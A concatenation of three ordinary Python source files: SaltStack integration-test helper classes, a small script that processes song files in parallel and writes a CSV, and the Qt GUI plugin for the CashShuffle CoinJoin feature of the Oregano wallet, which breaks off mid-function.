'the minion \'{1}\'. Command output: {2}'.format(
function, minion_tgt, orig
)
)
return orig[minion_tgt]
def run_state(self, function, **kwargs):
'''
Run the state.single command and return the state return structure
'''
return self.run_function('state.single', [function], **kwargs)
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
self.get_config_file_path('minion')
)
@property
def sub_minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
self.get_config_file_path('sub_minion')
)
@property
def master_opts(self):
'''
Return the options used for the minion
'''
return salt.config.master_config(
self.get_config_file_path('master')
)
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a syndic based execution test
'''
_salt_client_config_file_name_ = 'syndic_master'
def run_function(self, function, arg=()):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
orig = self.client.cmd('minion', function, arg, timeout=25)
if 'minion' not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion. Command output: {0}'.format(orig)
)
return orig['minion']
class ShellCase(AdaptedConfigurationTestCaseMixIn, ShellTestCase):
'''
Execute a test for a shell command
'''
_code_dir_ = CODE_DIR
_script_dir_ = SCRIPT_DIR
_python_executable_ = PYEXEC
def run_salt(self, arg_str, with_retcode=False):
'''
Execute salt
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt', arg_str, with_retcode=with_retcode)
def run_run(self, arg_str, with_retcode=False):
'''
Execute salt-run
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-run', arg_str, with_retcode=with_retcode)
def run_run_plus(self, fun, options='', *arg):
'''
Execute Salt run and the salt run function and return the data from
each in a dict
'''
ret = {}
ret['out'] = self.run_run(
'{0} {1} {2}'.format(options, fun, ' '.join(arg))
)
opts = salt.config.master_config(
self.get_config_file_path('master')
)
opts.update({'doc': False, 'fun': fun, 'arg': arg})
with RedirectStdStreams():
runner = salt.runner.Runner(opts)
ret['fun'] = runner.run()
return ret
def run_key(self, arg_str, catch_stderr=False, with_retcode=False):
'''
Execute salt-key
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script(
'salt-key',
arg_str,
catch_stderr=catch_stderr,
with_retcode=with_retcode
)
def run_cp(self, arg_str, with_retcode=False):
'''
Execute salt-cp
'''
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-cp', arg_str, with_retcode=with_retcode)
def run_call(self, arg_str, with_retcode=False):
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-call', arg_str, with_retcode=with_retcode)
class ShellCaseCommonTestsMixIn(CheckShellBinaryNameAndVersionMixIn):
_call_binary_expected_version_ = salt.__version__
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.utils import which
from salt.version import __version_info__, SaltStackVersion
git = which('git')
if not git:
self.skipTest('The git binary is not available')
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe', '--tags', '--match', 'v[0-9]*'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: {0!r}'.format(
err
)
)
parsed_version = SaltStackVersion.parse(out)
if parsed_version.info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. This test '
'would fail. Parsed({0!r}) < Expected({1!r})'.format(
parsed_version.info, __version_info__
)
)
elif parsed_version.info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version.string, out)
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{} is equal to {}. Salt returned an empty dictionary.'
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, basestring):
# If it's a basestring , make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in ret.values():
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSalStatetWarning(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertNotInSaltStateWarning(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertInSaltReturn(self, item_to_check, ret, keys):
return self.assertIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertNotInSaltReturn(self, item_to_check, ret, keys):
return self.assertNotIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
return self.assertRegexpMatches(
self.__getWithinSaltReturn(ret, keys), pattern
)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertNotEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
|
threadingScript.py
|
#!/usr/bin/env python
import os, sys
import threading
from Processor import Processor
from multiprocessing import Process, Queue
from view import getUser
def ThreadsSongs(user):
pro = Processor()
path = sys.argv[1]
q = Queue()
if not (path.endswith("/")):
path = path + "/"
imgPath = path + "img/"
if not os.path.exists(imgPath):
os.makedirs(imgPath)
files = os.listdir(path)
i = 0
threadList = list()
songsListPath= SESSION + str(user) + '.csv' #falta meter el nombre de usuario entre lo '+'
songsList=open(songsListPath,'w')
songsList.close()
for x in files:
print "Processing song %d: " % i + x
p = Process(target=pro.process_song, args=(path,imgPath,x,q))
threadList.append(p)
p.start()
i += 1
for p in threadList:
songsList = open(songsListPath, 'a')
d = q.get()
songsList.write(d)
songsList.close()
p.join()
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Ergon
# Copyright (C) 2018-2019 Oregano LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from oregano import networks
from oregano.plugins import BasePlugin, hook
from oregano.i18n import _
from oregano.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from oregano.network import Network
from oregano.address import Address
from oregano.transaction import Transaction
from oregano.simple_config import SimpleConfig, get_config
from oregano.wallet import Abstract_Wallet
from oregano_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from oregano_gui.qt.password_dialog import PasswordDialog
from oregano_gui.qt.main_window import ElectrumWindow
from oregano_gui.qt.amountedit import BTCAmountEdit
from oregano_gui.qt.utils import FixedAspectRatioSvgWidget
from .client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from .comms import query_server_for_stats, verify_ssl_socket
from .conf_keys import ConfKeys # config keys per wallet and global
from .coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, utxo_list.DataRoles.frozen_flags) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
is_slp = 's' in frozenstring
u_value = utxo['value']
if is_slp:
item.setText(5, _("SLP Token"))
elif not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
elif utxo['coinbase']: # we disallow coinbase coins unconditionally -- due to miner feedback (they don't like shuffling these)
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# fixoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
return ( "Shuffle" + (" {} {} {} {}{}(-{} fixs {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse fixoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot scale chg fee
# This is a mechanism as a workaround for issue #70 -- it's possible for last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse fixoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input
as that involves a lot of rebuilding of the addresses list for each call.
Also we use a set here which is faster than O(n) list lookup.
This matters on huge tx's with many inputs as a speedup.'''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
# defensie programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
utxo_list.in_progress = None
delattr(window.utxo_list, "in_progress")
delattr(window.utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
gui = None # The "gui object" singleton (ElectrumGui) -- a useful refrence to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return networks.net is not networks.TaxCoinNet
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.disabled_windows = [] # this is to manage the "cashshuffle disabled" xtra gui element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
